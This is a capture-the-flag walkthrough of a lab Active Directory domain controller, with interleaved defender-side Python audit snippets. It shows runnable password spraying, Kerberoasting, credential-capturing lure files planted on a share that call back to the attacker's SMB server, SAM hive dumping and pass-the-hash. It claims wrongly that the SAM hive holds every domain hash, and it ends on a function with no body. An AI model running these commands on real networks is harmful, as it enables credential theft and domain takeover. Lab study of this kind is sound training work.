Overview

BuildingMagic is an Easy machine from HackSmarter that starts off with cracking hashes from a leaked database file, then using the newfound credentials to abuse misconfigurations in Active Directory. After some Kerberoasting, a ForceChangePassword, and a round with the ntlm_theft tool, you’ll end up abusing SeBackupPrivilege for root.

Objective & Scope

Objective: As a penetration tester on the Hack Smarter Red Team, your objective is to achieve a full compromise of the Active Directory environment.

Initial Access: A prior enumeration phase has yielded a leaked database containing user credentials (usernames and hashed passwords). This information will serve as your starting point for gaining initial access to the network.

Execution: Your task is to leverage the compromised credentials to escalate privileges, move laterally through the Active Directory, and ultimately achieve a complete compromise of the domain.

Needed /etc/hosts entries:

ip	dc01.buildingmagic.local buildingmagic.local

Nmap Scan

I’ll run nmap on all TCP ports with NSE:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nmap -sCV -p 3389,53,135,445,389,636,88,445 -vvvvv 10.1.116.112 --open
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-28 19:16 EST
Nmap scan report for 10.1.116.112
Host is up, received echo-reply ttl 126 (0.079s latency).
Scanned at 2025-11-28 19:16:27 EST for 53s

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2025-11-29 00:17:40Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: BUILDINGMAGIC.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 126
636/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2025-11-29T00:18:25+00:00; +1m07s from scanner time.
| ssl-cert: Subject: commonName=DC01.BUILDINGMAGIC.LOCAL
| Issuer: commonName=DC01.BUILDINGMAGIC.LOCAL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-02T21:29:10
| Not valid after: 2026-03-04T21:29:10
| MD5: cb18:d563:ae1d:22d2:bd56:6b1c:ba62:94b1
| SHA-1: 4589:0eef:a106:c58c:d5a7:8fcc:0f87:1da5:1d84:6e69
| -----BEGIN CERTIFICATE-----
| MIIC9DCCAdygAwIBAgIQ<snip>pIyjfR5Tg/BHdg==
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: BUILDINGMAGIC
| NetBIOS_Domain_Name: BUILDINGMAGIC
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: BUILDINGMAGIC.LOCAL
| DNS_Computer_Name: DC01.BUILDINGMAGIC.LOCAL
| Product_Version: 10.0.20348
|_ System_Time: 2025-11-29T00:17:45+00:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m06s, deviation: 0s, median: 1m05s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-11-29T00:17:48
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 19792/tcp): CLEAN (Timeout)
| Check 2 (port 44695/tcp): CLEAN (Timeout)
| Check 3 (port 29812/udp): CLEAN (Timeout)
| Check 4 (port 58131/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.62 seconds
Raw packets sent: 11 (460B) | Rcvd: 8 (336B)

This is a Domain Controller (DC) with the FQDN dc01.buildingmagic.local, so I’ll add that entry to my /etc/hosts file.

Recon

Leaked Database File

In the machine information there is a leaked database file:

id	username	full_name	role		password
1 r.widdleton Ron Widdleton Intern Builder c4a21c4d438819d73d24851e7966229c
2 n.bottomsworth Neville Bottomsworth Plannner 61ee643c5043eadbcdc6c9d1e3ebd298
3 l.layman Luna Layman Planner 8960516f904051176cc5ef67869de88f
4 c.smith Chen Smith Builder bbd151e24516a48790b2cd5845e7f148
5 d.thomas Dean Thomas Builder 4d14ff3e264f6a9891aa6cea1cfa17cb
6 s.winnigan Samuel Winnigan HR Manager 078576a0569f4e0b758aedf650cb6d9a
7 p.jackson Parvati Jackson Shift Lead eada74b2fa7f5e142ac412d767831b54
8 b.builder Bob Builder Electrician dd4137bab3b52b55f99f18b7cd595448
9 t.ren Theodore Ren Safety Officer bfaf794a81438488e57ee3954c27cd75
10 e.macmillan Ernest Macmillan Surveyor 47d23284395f618bea1959e710bc68ef

This leak includes 10 MD5 hashes for employees of the target company. Dump the table into a file and run it through this command to extract only the MD5 hashes:

grep -Eo '\b[a-f0-9]{32}\b' filename

I’ll take these hashes and load them into CrackStation to see if any of them will crack:

[Screenshot: Cracked Passwords]

Two passwords cracked. I’ll save the users to a file and spray the leaked passwords with kerbrute. You can make a user wordlist with this command: grep -Eo '\b[a-z]\.[a-z]+'.

Results:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  kerbrute passwordspray --dc dc01.buildingmagic.local -d buildingmagic.local users.txt 'lilronron'

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 11/28/25 - Ronnie Flathers @ropnop

2025/11/28 19:32:05 > Using KDC(s):
2025/11/28 19:32:05 > dc01.buildingmagic.local:88

2025/11/28 19:32:06 > [+] VALID LOGIN: r.widdleton@buildingmagic.local:lilronron
2025/11/28 19:32:06 > Done! Tested 10 logins (1 successes) in 0.343 seconds
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜ kerbrute passwordspray --dc dc01.buildingmagic.local -d buildingmagic.local users.txt 'shadowhex7'

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 11/28/25 - Ronnie Flathers @ropnop

2025/11/28 19:32:09 > Using KDC(s):
2025/11/28 19:32:09 > dc01.buildingmagic.local:88

2025/11/28 19:32:09 > Done! Tested 10 logins (0 successes) in 0.180 seconds

One valid login, r.widdleton:lilronron; I’ll be using this user from now on.
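As an added example (mine, not part of the writeup or of any tool it uses), here is the hash extraction and the user wordlist step done in Python: it pulls the username and digest out of each row of the leaked table regardless of the spaces in names and roles, and adds the checks a defender would run on such a dump (how the passwords are stored, and whether two employees share one). The dump excerpt is constructed from the rows quoted above.

```python
import re

# Constructed excerpt of the leaked table quoted in the writeup, same row layout:
# id, username, full name, role, hash. Name and role may contain spaces.
LEAKED_DUMP = """id\tusername\tfull_name\trole\t\tpassword
1 r.widdleton Ron Widdleton Intern Builder c4a21c4d438819d73d24851e7966229c
2 n.bottomsworth Neville Bottomsworth Plannner 61ee643c5043eadbcdc6c9d1e3ebd298
6 s.winnigan Samuel Winnigan HR Manager 078576a0569f4e0b758aedf650cb6d9a
"""

USER_RE = re.compile(r"^[a-z]\.[a-z]+$")   # first-initial.lastname convention
HEX32_RE = re.compile(r"^[a-f0-9]{32}$")    # 32 hex chars: unsalted MD5 (or NTLM)


def parse_leak(text):
    """Return (username, digest) pairs from the flattened table.

    Column positions are unreliable because full_name and role contain spaces,
    so the username is taken as the second field and the digest as the last.
    """
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or not fields[0].isdigit():
            continue                              # header or blank line
        user, digest = fields[1], fields[-1].lower()
        if USER_RE.match(user):
            rows.append((user, digest))
    return rows


def usernames(text):
    """The user wordlist the grep one-liner in the writeup produces."""
    return [user for user, _ in parse_leak(text)]


def assess_leak(text):
    """Defender-side view of the dump: how many passwords are stored as a bare
    32-hex digest (fast, unsalted: crackable by lookup, as CrackStation showed)
    and whether two employees share a digest, i.e. share a password."""
    rows = parse_leak(text)
    by_digest = {}
    for user, digest in rows:
        by_digest.setdefault(digest, []).append(user)
    return {
        "total": len(rows),
        "unsalted_fast_hash": sum(1 for _, d in rows if HEX32_RE.match(d)),
        "shared_passwords": {d: u for d, u in by_digest.items() if len(u) > 1},
    }
```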

445/tcp - SMB

I’ll check for non-default shares using nxc:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc smb dc01.buildingmagic.local -u r.widdleton -p lilronron --shares                                           
SMB 10.1.116.112 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:BUILDINGMAGIC.LOCAL) (signing:True) (SMBv1:False)
SMB 10.1.116.112 445 DC01 [+] BUILDINGMAGIC.LOCAL\r.widdleton:lilronron
SMB 10.1.116.112 445 DC01 [*] Enumerated shares
SMB 10.1.116.112 445 DC01 Share Permissions Remark
SMB 10.1.116.112 445 DC01 ----- ----------- ------
SMB 10.1.116.112 445 DC01 ADMIN$ Remote Admin
SMB 10.1.116.112 445 DC01 C$ Default share
SMB 10.1.116.112 445 DC01 File-Share Central Repository of Building Magic's files.
SMB 10.1.116.112 445 DC01 IPC$ READ Remote IPC
SMB 10.1.116.112 445 DC01 NETLOGON Logon server share
SMB 10.1.116.112 445 DC01 SYSVOL Logon server share

There is one non-default share, File-Share; I’ll get into that later once we have access.

389/tcp - LDAP

I’ll get a bloodhound dump to check for any misconfigurations using nxc:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc ldap dc01.buildingmagic.local -u r.widdleton -p lilronron --bloodhound --dns-tcp --dns-server 10.1.116.112 -c All
LDAP 10.1.116.112 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:BUILDINGMAGIC.LOCAL)
LDAP 10.1.116.112 389 DC01 [+] BUILDINGMAGIC.LOCAL\r.widdleton:lilronron
LDAP 10.1.116.112 389 DC01 Resolved collection methods: dcom, container, objectprops, group, acl, rdp, trusts, session, localadmin, psremote
LDAP 10.1.116.112 389 DC01 Done in 00M 16S
LDAP 10.1.116.112 389 DC01 Compressing output into /root/.nxc/logs/DC01_10.1.116.112_2025-11-28_193427_bloodhound.zip
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜ cp /root/.nxc/logs/DC01_10.1.116.112_2025-11-28_193427_bloodhound.zip ~/bloodhound/buildingmagic.zip

Auth as r.haggard

Looking in bloodhound under the List all Kerberoastable Accounts query, I see that the user r.haggard is Kerberoastable because he has this SPN set:

HOGWARTS-DC/r.hagrid.WIZARDING.THM:60111

I’ll use impacket-GetUserSPNs to perform this attack:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  impacket-GetUserSPNs buildingmagic.local/r.widdleton:lilronron -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------------- --------- -------- -------------------------- -------------------------- ----------
HOGWARTS-DC/r.hagrid.WIZARDING.THM:60111 r.haggard 2025-05-15 17:09:04.002067 2025-05-15 18:34:51.644710

[-] CCache file is not found. Skipping...
$krb5tgs$23$*r.haggard$BUILDINGMAGIC.LOCAL$buildingmagic.local/r.haggard*$ec2e2b90e380193285d87d113d2125f6$2c9512dd2e845ead731d8e99e3cbffcf5e47ce89534a768c752e6354483c4cbdded823c153ad357d989b6d400dea86e641cd67f61b2cafc5bf7b74b15fb03e908ae08ce2afc9383a461cbbfb5b414391<snip>a96470bde330c34

I’ll crack this hash using hashcat:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  hashcat -a 0 r.haggard.hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

$krb5tgs$23$*r.haggard$BUILDINGMAGIC.LOCAL$buildingmagic.local/r.haggard*$ec2<snip>30c34:rubeushagrid

The hash cracks to rubeushagrid so we have a new set of credentials:

r.haggard \ rubeushagrid
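An added example of my own (not impacket's or hashcat's code) showing what the $krb5tgs$ line above actually encodes and why it cracked so quickly: the second field is the Kerberos encryption type, and 23 means RC4-HMAC, which hashcat runs as mode 13100 at wordlist speed. The sample hash reuses the user, realm and checksum from the page with a shortened, constructed ciphertext; the hashcat mode numbers are real, the recommendation text is mine.

```python
import re

# Hashcat modes for Kerberos TGS-REP hashes, keyed by Kerberos encryption type.
TGS_MODES = {23: "13100 (RC4-HMAC, etype 23)",
             17: "19600 (AES128-CTS-HMAC-SHA1-96, etype 17)",
             18: "19700 (AES256-CTS-HMAC-SHA1-96, etype 18)"}

# Constructed sample in the layout impacket printed in the writeup
# ($krb5tgs$23$*user$REALM$spn*$checksum$edata); the checksum is the one shown
# on the page, the ciphertext is shortened placeholder hex.
SAMPLE_TGS = ("$krb5tgs$23$*r.haggard$BUILDINGMAGIC.LOCAL$buildingmagic.local/r.haggard*"
              "$ec2e2b90e380193285d87d113d2125f6$2c9512dd2e845ead731d8e99e3cbffcf5e47ce89")


def parse_tgs_hash(line):
    """Split a $krb5tgs$ line into its fields. Returns None if it is not one."""
    parts = line.strip().split("$")
    if len(parts) < 7 or parts[1] != "krb5tgs" or not parts[2].isdigit():
        return None
    etype = int(parts[2])
    user = parts[3].strip("*")
    realm = parts[4]
    # The RC4 layout carries *spn* as its own field; the AES layout may omit it.
    # Checksum and ciphertext are always the last two fields.
    spn = parts[5].strip("*") if len(parts) >= 8 else None
    checksum, edata = parts[-2], parts[-1]
    if not re.fullmatch(r"[0-9a-f]+", checksum + edata, re.I):
        return None
    return {"etype": etype, "user": user, "realm": realm, "spn": spn,
            "checksum": checksum, "edata": edata}


def assess_tgs_hash(line):
    """Defender view: which hashcat mode the ticket maps to and whether the
    service account still hands out RC4 tickets, the cheap-to-crack case above."""
    h = parse_tgs_hash(line)
    if h is None:
        return None
    rc4 = h["etype"] == 23
    h["hashcat_mode"] = TGS_MODES.get(h["etype"], "unknown etype")
    h["rc4_allowed"] = rc4
    h["recommendation"] = (
        "restrict the account to AES (msDS-SupportedEncryptionTypes) and rotate it "
        "to a long random password or a gMSA" if rc4 else
        "AES ticket; still ensure the account password is long and random")
    return h
```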

Auth as h.potch

Looking at what Outbound control our user has, I see a ForceChangePassword to h.potch:

To abuse this I’ll use bloodyAD:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  bloodyAD --host dc01.buildingmagic.local -u r.haggard -p rubeushagrid set password h.potch Password123 
[+] Password changed successfully!

And now I can auth as this user:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc ldap dc01.buildingmagic.local -u h.potch -p Password123
LDAP 10.1.116.112 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:BUILDINGMAGIC.LOCAL)
LDAP 10.1.116.112 389 DC01 [+] BUILDINGMAGIC.LOCAL\h.potch:Password123

Auth as h.grangon

Revisiting SMB, I see that I now have Read & Write over the share we came across earlier:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc smb dc01.buildingmagic.local -u h.potch -p Password123 --shares
SMB 10.1.116.112 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:BUILDINGMAGIC.LOCAL) (signing:True) (SMBv1:False)
SMB 10.1.116.112 445 DC01 [+] BUILDINGMAGIC.LOCAL\h.potch:Password123
SMB 10.1.116.112 445 DC01 [*] Enumerated shares
SMB 10.1.116.112 445 DC01 Share Permissions Remark
SMB 10.1.116.112 445 DC01 ----- ----------- ------
SMB 10.1.116.112 445 DC01 ADMIN$ Remote Admin
SMB 10.1.116.112 445 DC01 C$ Default share
SMB 10.1.116.112 445 DC01 File-Share READ,WRITE Central Repository of Building Magic's files.
SMB 10.1.116.112 445 DC01 IPC$ READ Remote IPC
SMB 10.1.116.112 445 DC01 NETLOGON READ Logon server share
SMB 10.1.116.112 445 DC01 SYSVOL READ Logon server share

I’ll connect to the share using impacket-smbclient:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  impacket-smbclient buildingmagic.local/h.potch:Password123@dc01.buildingmagic.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use File-Share
# ls
drw-rw-rw- 0 Fri Nov 28 19:40:58 2025 .
drw-rw-rw- 0 Tue Sep 2 15:37:28 2025 ..

The share is empty; the only interesting thing here is that I have Write, so I can drop files into it. One thing I usually try in these scenarios is to generate files containing UNC paths that point to my fake SMB server, using the tool ntlm_theft:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  python3 /opt/tools/ntlm_theft/ntlm_theft.py --generate all -f xjr -s 10.200.10.156
Created: xjr/xjr.scf (BROWSE TO FOLDER)
Created: xjr/xjr-(url).url (BROWSE TO FOLDER)
Created: xjr/xjr-(icon).url (BROWSE TO FOLDER)
Created: xjr/xjr.lnk (BROWSE TO FOLDER)
Created: xjr/xjr.rtf (OPEN)
Created: xjr/xjr-(stylesheet).xml (OPEN)
Created: xjr/xjr-(fulldocx).xml (OPEN)
Created: xjr/xjr.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: xjr/xjr-(includepicture).docx (OPEN)
Created: xjr/xjr-(remotetemplate).docx (OPEN)
Created: xjr/xjr-(frameset).docx (OPEN)
Created: xjr/xjr-(externalcell).xlsx (OPEN)
Created: xjr/xjr.wax (OPEN)
Created: xjr/xjr.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: xjr/xjr.asx (OPEN)
Created: xjr/xjr.jnlp (OPEN)
Created: xjr/xjr.application (DOWNLOAD AND OPEN)
Created: xjr/xjr.pdf (OPEN AND ALLOW)
Created: xjr/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: xjr/Autorun.inf (BROWSE TO FOLDER)
Created: xjr/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

Now I’ll drop some of the files that are more likely to work into the share:

# lcd xjr
xjr
# put xjr.lnk
# put desktop.ini
# put xjr-(url).url
# put xjr-(icon).url
# ls
drw-rw-rw- 0 Fri Nov 28 19:44:50 2025 .
drw-rw-rw- 0 Tue Sep 2 15:37:28 2025 ..
-rw-rw-rw- 49 Fri Nov 28 19:44:40 2025 desktop.ini
-rw-rw-rw- 110 Fri Nov 28 19:44:51 2025 xjr-(icon).url
-rw-rw-rw- 58 Fri Nov 28 19:44:47 2025 xjr-(url).url
-rw-rw-rw- 2164 Fri Nov 28 19:44:34 2025 xjr.lnk

And I’ll start an SMB Server to capture the NetNTLMv2 hash using impacket-smbserver:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  impacket-smbserver s . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

And after about 30 seconds, we capture the hash for h.grangon:

[*] Incoming connection (10.1.116.112,50267)
[*] AUTHENTICATE_MESSAGE (BUILDINGMAGIC\h.grangon,DC01)
[*] User DC01\h.grangon authenticated successfully
[*] h.grangon::BUILDINGMAGIC:aaaaaaaaaaaaaaaa:826<snip>000000

I’ll take this hash and crack it via hashcat:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  hashcat -a 0 h.grangon.hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

H.GRANGON::BUILDINGMAGIC:aaaaaaaaaaaaaaaa:<snip>00000:magic4ever

The hash cracks to: magic4ever, giving us another set of credentials:

h.grangon \ magic4ever
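The files planted in File-Share above work because Explorer resolves a remote IconFile/IconResource as soon as someone lists the folder. As an added example (my code, not ntlm_theft's or impacket's), here is the check a share owner can run to catch such files: it parses the text-based lure types, extracts every UNC or file:// host they reference, and flags any host outside an allowlist. The sample share contents are constructed in the standard .url and desktop.ini INI layout, and the trusted-host set is an assumption for this example.

```python
import re
from pathlib import Path

# Hosts a file on this share may legitimately reference (assumption for the example).
TRUSTED_HOSTS = {"dc01", "dc01.buildingmagic.local", "10.1.116.112"}

# Text-based file types the Explorer shell resolves as soon as the folder is
# listed, so a remote icon path triggers an outbound SMB authentication without
# anyone opening the file. (.lnk is binary and needs a separate parser.)
AUTO_RESOLVED_SUFFIXES = (".url", ".scf", "desktop.ini", "autorun.inf")

# \\host\share or file://host references; captures the host part.
REMOTE_REF_RE = re.compile(r"(?:\\\\|file://)([A-Za-z0-9._-]+)", re.IGNORECASE)


def referenced_hosts(content):
    """All hosts named in UNC or file:// references inside a text file."""
    return {m.group(1).lower() for m in REMOTE_REF_RE.finditer(content)}


def assess_file(name, content, trusted=TRUSTED_HOSTS):
    """One finding per file: which foreign hosts it points at and whether the
    shell would follow that reference on a mere directory listing."""
    untrusted = sorted(h for h in referenced_hosts(content) if h not in trusted)
    return {
        "file": name,
        "auto_resolved": name.lower().endswith(AUTO_RESOLVED_SUFFIXES),
        "untrusted_hosts": untrusted,
        "suspicious": bool(untrusted),
    }


def scan_share(files, trusted=TRUSTED_HOSTS):
    """files: {name: text content}. Returns only findings worth alerting on,
    auto-resolved (most dangerous) first."""
    findings = [assess_file(n, c, trusted) for n, c in files.items()]
    return sorted((f for f in findings if f["suspicious"]),
                  key=lambda f: not f["auto_resolved"])


def scan_directory(path, trusted=TRUSTED_HOSTS):
    """Same check over a mounted share directory."""
    files = {p.name: p.read_text(errors="ignore")
             for p in Path(path).iterdir() if p.is_file()}
    return scan_share(files, trusted)


# Constructed sample contents in the standard .url / desktop.ini INI layout:
# two planted files pointing at a foreign host and one benign shortcut to the DC.
SAMPLE_SHARE = {
    "xjr-(icon).url": "[InternetShortcut]\r\nURL=https://example.invalid/\r\n"
                      "IconIndex=1\r\nIconFile=\\\\10.200.10.156\\share\\xjr.ico\r\n",
    "desktop.ini": "[.ShellClassInfo]\r\nIconResource=\\\\10.200.10.156\\share\\xjr.ico,0\r\n",
    "handbook.url": "[InternetShortcut]\r\nURL=file://dc01.buildingmagic.local/File-Share/hb.pdf\r\n",
}
```

Pair this with alerting on the server side: a flood of outbound SMB authentications from a file server to an unknown internal IP, as happened within 30 seconds here, is the other half of the detection.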

This user is a part of the Remote Management Users group, so I can WinRM to the machine as this user via evil-winrm:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  evil-winrm -i dc01.buildingmagic.local -u h.grangon -p magic4ever

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.grangon\Documents>

And with that I can get the user flag:

*Evil-WinRM* PS C:\Users\h.grangon\Documents> cd ..\Desktop
ls
*Evil-WinRM* PS C:\Users\h.grangon\Desktop> ls


Directory: C:\Users\h.grangon\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/2/2025 7:41 PM 2308 Microsoft Edge.lnk
-a---- 9/2/2025 7:41 PM 32 user.txt
*Evil-WinRM* PS C:\Users\h.grangon\Desktop> cat user.txt
701b<snip>

Auth as a.flatch

Running whoami /priv, I can see that my user has SeBackupPrivilege:

*Evil-WinRM* PS C:\Users\h.grangon\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

This privilege is intended to allow the user to back up files and directories. But as an attacker you can use it to back up the SAM & SYSTEM hives, which contain all of the NTLM hashes across the domain:

*Evil-WinRM* PS C:\Users\h.grangon\Desktop> mkdir goodies


Directory: C:\Users\h.grangon\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/28/2025 4:49 PM goodies


*Evil-WinRM* PS C:\Users\h.grangon\Desktop> cd goodies
*Evil-WinRM* PS C:\Users\h.grangon\Desktop\goodies> reg save hklm\sam C:\Users\h.grangon\Desktop\goodies\sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\h.grangon\Desktop\goodies> reg save hklm\system C:\Users\h.grangon\Desktop\goodies\system
The operation completed successfully.

Now I can download these files using the download command in evil-winrm:

*Evil-WinRM* PS C:\Users\h.grangon\Desktop\goodies> download sam

Info: Downloading C:\Users\h.grangon\Desktop\goodies\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\Users\h.grangon\Desktop\goodies> download system

Info: Downloading C:\Users\h.grangon\Desktop\goodies\system to system

Info: Download successful!

And using the tool impacket-secretsdump, I can locally parse these files to extract the Administrator’s NT hash:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xf61a94fb13f74350a1f87f509c8c455c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

But the Administrator’s hash doesn’t work directly, so I’ll get a fresh, full list of users and spray the hash:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc ldap dc01.buildingmagic.local -u h.grangon -p magic4ever --users | grep -vE '\b(Administrator|Guest|krbtgt|-Username-)\b' | awk '{print $5}'
[*]
[+]
[*]
-Username-
h.potch
r.widdleton
r.haggard
h.grangon
a.flatch
root@kali:~/hacksmarter/BuildingMagic/enumeration ➜ nxc ldap dc01.buildingmagic.local -u h.grangon -p magic4ever --users | grep -vE '\b(Administrator|Guest|krbtgt|)\b' | awk '{print $5}' > users.txt

I removed the -Username- part to get this list:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  cat users.txt
h.potch
r.widdleton
r.haggard
h.grangon
a.flatch

And I can spray the NT hash using nxc:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  nxc ldap dc01.buildingmagic.local -u users.txt -H 520126a03f5d5a8d836f1c4f34ede7ce --no-bruteforce
LDAP 10.1.116.112 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:BUILDINGMAGIC.LOCAL)
LDAP 10.1.116.112 389 DC01 [-] BUILDINGMAGIC.LOCAL\h.potch:520126a03f5d5a8d836f1c4f34ede7ce
LDAP 10.1.116.112 389 DC01 [-] BUILDINGMAGIC.LOCAL\r.widdleton:520126a03f5d5a8d836f1c4f34ede7ce
LDAP 10.1.116.112 389 DC01 [-] BUILDINGMAGIC.LOCAL\r.haggard:520126a03f5d5a8d836f1c4f34ede7ce
LDAP 10.1.116.112 389 DC01 [-] BUILDINGMAGIC.LOCAL\h.grangon:520126a03f5d5a8d836f1c4f34ede7ce
LDAP 10.1.116.112 389 DC01 [+] BUILDINGMAGIC.LOCAL\a.flatch:520126a03f5d5a8d836f1c4f34ede7ce
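The spray succeeded only because a.flatch uses the same password as the local Administrator. As an added example (my code, not impacket's), here is the audit a defender would run over a secretsdump-style output to surface exactly that condition, plus the two other things worth flagging in such a dump: empty passwords and legacy LM hashes. The sample reuses the three SAM lines from the page and adds a constructed domain line for a.flatch with a placeholder RID.

```python
import re

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
NO_LM = "aad3b435b51404eeaad3b435b51404ee"     # LM field when no LM hash is stored

DUMP_LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::", re.I)

# Constructed sample: the three SAM lines from the writeup plus an invented domain
# line for a.flatch (RID 9999 is a placeholder) that reuses the Administrator's
# NT hash, which is what the hash spray on the page revealed.
SAMPLE_DUMP = """[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BUILDINGMAGIC.LOCAL\\a.flatch:9999:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
[*] Cleaning up...
"""


def parse_dump(text):
    """Parse secretsdump-style user:rid:lm:nt::: lines; other output is ignored."""
    entries = []
    for line in text.splitlines():
        m = DUMP_LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["user"] = e["user"].split("\\")[-1]     # drop DOMAIN\ prefix
            e["lm"], e["nt"] = e["lm"].lower(), e["nt"].lower()
            entries.append(e)
    return entries


def audit_dump(text):
    """Findings a defender wants from such a dump: accounts sharing one NT hash
    (same password, so one compromised account unlocks the others), accounts
    with an empty password (built-ins are usually disabled, but verify), and
    accounts still storing an LM hash."""
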